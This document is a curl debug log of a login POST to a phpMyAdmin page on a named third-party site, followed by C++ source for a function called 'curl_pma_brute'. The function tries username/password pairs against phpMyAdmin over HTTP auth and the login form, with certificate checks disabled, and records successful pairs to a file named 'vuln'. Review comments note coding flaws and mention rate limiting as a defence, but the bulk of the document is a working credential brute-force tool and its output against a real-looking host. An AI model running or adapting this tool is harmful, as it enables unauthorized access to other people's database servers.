- > POST /phpMyAdmin-4.0.10.20-english/index.php HTTP/1.1
- Host: gangbangebony.com
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
- Accept: */*
- Cookie: phpMyAdmin=n17vf2r3rc532vvpqkmhua4hh7; pma_lang=en; __cfduid=d68021a412017ac69cee2890ea0b1e4371537310970
- Content-Length: 107
- Content-Type: application/x-www-form-urlencoded
- * upload completely sent off: 107 out of 107 bytes
- < HTTP/1.1 302 Found
- < Date: Tue, 18 Sep 2018 22:49:36 GMT
- < Content-Type: text/html; charset=UTF-8
- < Transfer-Encoding: chunked
- < Connection: keep-alive
- < Expires: Thu, 19 Nov 1981 08:52:00 GMT
- < Cache-Control: private, max-age=10800
- < Last-Modified: Wed, 29 Mar 2017 01:03:24 GMT
- * Added cookie pmaUser-1="%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 1539893577
- < Set-Cookie: pmaUser-1=%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D; expires=Thu, 18-Oct-2018 22:49:35 GMT; Max-Age=2592000; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
- * Added cookie pmaAuth-1="%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 0
- < Set-Cookie: pmaAuth-1=%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
- < X-ob_mode: 0
- < Location: https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8
- < Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
- < Server: cloudflare
- < CF-RAY: 45c75dd93b019cb9-AMS
- <
- * Ignoring the response-body
- * Connection #0 to host gangbangebony.com left intact
- * Issue another request to this URL: 'https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8'
- * Switch from POST to GET
- * Found bundle for host gangbangebony.com: 0x1decdc0 [can pipeline]
- * Trying 104.27.153.115...
- * TCP_NODELAY set
- * Connected to gangbangebony.com (104.27.153.115) port 80 (#1)
- * ALPN, offering http/1.1
- * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
- * successfully set certificate verify locations:
- * CAfile: /etc/ssl/certs/ca-certificates.crt
- CApath: none
- * error:1408F10B:SSL routines:ssl3_get_record:wrong version number
- * Closing connection 1
- curl_easy_perform() failed: SSL connect error
- RES1=[0]
- /**
-  * Try a single user/password pair against the phpMyAdmin page at `url`.
-  *
-  * Flow as written:
-  *   1. Request `url` with HTTP authentication (CURLAUTH_ANY) using "user:pass".
-  *      No POST body is set here, so this is presumably a plain GET.
-  *   2. If the captured reply contains "HTTP/1.1 200 OK" and the pmahomme logo
-  *      path, the pair is treated as valid.
-  *   3. Otherwise, if the reply contains the pma_username / pma_password form
-  *      fields, the form token is read from the page and the same pair is POSTed
-  *      to `url`; the check from step 2 is then repeated.
-  *
-  * @param url         target URL, passed unchanged to CURLOPT_URL
-  * @param user        user name to try
-  * @param pass        password to try
-  * @param debug_curl  values >= 3 turn on libcurl verbose output and print the reply
-  * @return 1 when a hit was recorded, 0 otherwise (transport errors included)
-  *
-  * Side effect: on a hit, "url:user:pass\n" is appended to the file "vuln" through
-  * file_put_contents(), i.e. the credentials are written to disk in clear text.
-  *
-  * Names used here but defined outside this listing: timeout, USERAGENT,
-  * WriteMemoryCallback, struct MemoryStruct, file_put_contents.
-  * The body uses std::string, so this is C++ even though most of it is C-style.
-  *
-  * NOTE(review), defensive reading: what this routine puts on the wire is a fixed
-  * User-Agent (USERAGENT), an authenticated request followed by a form POST with
-  * pma_username, pma_password, server=1 and token, and TLS with certificate checks
-  * switched off. Login rate limiting or lockout, and not exposing the phpMyAdmin
-  * path to the internet, are the controls that address this request pattern.
-  */
- int curl_pma_brute(char* url, char* user, char* pass, int debug_curl)
- {
- /*
- curl_version_info_data *d = curl_version_info(CURLVERSION_NOW);
- puts(d->version);
- puts(d->libssh_version);
- puts(d->ssl_version);
- exit(0);
- */
- int result = 0;
- CURL *curl_handle;
- CURLcode res;
- struct MemoryStruct chunk;
- char* curl_error;
- // chunk_headers and chunk_temp are only referenced by the commented-out Host-header code below.
- struct curl_slist *chunk_headers = NULL;
- char chunk_temp[4096];
- // Global libcurl init/cleanup is done on every call of this function.
- curl_global_init(CURL_GLOBAL_ALL);
- // NOTE(review): malloc result is not checked, and the byte is not initialised here.
- chunk.memory = (char*) malloc(1);
- chunk.size = 0;
- // CURL1
- // NOTE(review): return value of curl_easy_init() is not checked before use.
- curl_handle = curl_easy_init();
- curl_easy_setopt(curl_handle, CURLOPT_URL, url);
- curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
- // The same `timeout` value (defined elsewhere) bounds both the connect phase and the whole transfer.
- curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
- // Response data is handed to WriteMemoryCallback with &chunk as its user pointer.
- curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
- curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
- // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
- /*
- memset(chunk_temp,0,sizeof(chunk_temp));
- sprintf(chunk_temp,"Host: %s",original_host);
- chunk_headers = curl_slist_append(chunk_headers, chunk_temp);
- curl_easy_setopt(curl_handle, CURLOPT_HTTPHEADER, chunk_headers);
- */
- // Response headers are delivered together with the body; the status-line checks below rely on this.
- curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
- // Certificate host-name and chain verification are both disabled: any certificate is accepted.
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
- // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
- // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST,"RC4-SHA");
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
- // An empty file name turns on libcurl's in-memory cookie handling without loading a cookie file.
- curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
- // NOTE(review): CURLOPT_VERBOSE takes a long; a plain int 1 is passed here.
- if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
- // curl_easy_setopt(curl_handle, CURLOPT_FAILONERROR, 1L);
- // curl_easy_setopt(curl_handle, CURLOPT_UPLOAD, 1L);
- // "user:pass" for HTTP authentication is built in a fixed 500-byte stack buffer.
- // NOTE(review): sprintf does not bound the write; user and pass lengths are not checked.
- char user_pass[500];
- memset(user_pass,0,sizeof(user_pass));
- sprintf(user_pass,"%s:%s",user,pass);
- curl_easy_setopt(curl_handle, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
- curl_easy_setopt(curl_handle, CURLOPT_USERPWD,user_pass);
- // NOTE(review): the two comments below originally embedded a user name and password for the host; they are redacted here.
- // <REDACTED_USER>:<REDACTED_PASSWORD>@gangbangebony.com/phpMyAdmin-4.8.3-all-languages/
- // curl -vvv -k -u '<REDACTED_USER>:<REDACTED_PASSWORD>' -H 'Accept: application/json' 'https://gangbangebony.com/phpMyAdmin-4.8.3-all-languages/' --trace-ascii - -X PROPFIND -D -
- // First transfer: the HTTP-authenticated request.
- res = curl_easy_perform(curl_handle);
- if(res != CURLE_OK)
- {
- // Transport failure: result stays 0; the error text is only printed at debug level >= 3.
- curl_error = (char*) curl_easy_strerror(res);
- if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
- }
- else
- {
- // NOTE(review): "%lu" expects unsigned long, but the argument is cast to long.
- if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
- if(debug_curl >=3) puts(chunk.memory);
- // Success heuristic: a 200 status line plus the pmahomme theme logo path anywhere in the captured reply.
- if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
- {
- result = 1;
- // Record the hit as "url:user:pass" in the file "vuln" (unbounded sprintf into 500 bytes).
- char temp_filename_line[500];
- memset(temp_filename_line,0,500);
- sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
- file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
- }
- // Otherwise: a 200 reply that contains the phpMyAdmin login form fields.
- else if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"name=\"pma_username\"") && strstr(chunk.memory,"name=\"pma_password\""))
- {
- std::string s1(chunk.memory);
- string delimiter1 = "name=\"token\"";
- // The value assigned on the next line is overwritten immediately by the line after it.
- string token1 = s1.substr(52, s1.find(delimiter1)); // token is "scott"
- // Token = 32 characters starting 20 characters after the first occurrence of name="token".
- token1 = s1.substr(s1.find(delimiter1)+20,32);
- // it is a box, post it
- // The same easy handle is reused; the options below repeat the values set for the first transfer.
- // The HTTP-auth options set earlier are not cleared, so they remain on the handle.
- curl_easy_setopt(curl_handle, CURLOPT_URL, url);
- curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
- curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
- curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
- // chunk is not reset between transfers. NOTE(review): if WriteMemoryCallback appends (not shown
- // here - confirm), the second reply lands after the first and the checks below see both.
- curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
- curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
- // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
- curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
- curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
- // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
- // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
- // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
- curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
- // Form body: pma_username, pma_password, server=1 and the token read above.
- // user and pass are inserted as-is (no URL encoding) with an unbounded sprintf into 500 bytes.
- char post_string[500];
- memset(post_string,0,500);
- sprintf(post_string,"pma_username=%s&pma_password=%s&server=%s&token=%s",user,pass,"1",token1.c_str());
- // Setting CURLOPT_POSTFIELDS switches the request on this handle to POST.
- curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string);
- if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
- // Second transfer: the login form POST.
- res = curl_easy_perform(curl_handle);
- if(res != CURLE_OK)
- {
- curl_error = (char*) curl_easy_strerror(res);
- if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
- }
- else
- {
- if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
- if(debug_curl >=3) puts(chunk.memory);
- // Same success heuristic and the same "vuln" record as after the first transfer.
- if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
- {
- result = 1;
- char temp_filename_line[500];
- memset(temp_filename_line,0,500);
- sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
- file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
- }
- }
- }
- }
- // Release the handle, the response buffer and libcurl's global state on every path.
- curl_easy_cleanup(curl_handle);
- free(chunk.memory);
- curl_global_cleanup();
- return result;
- }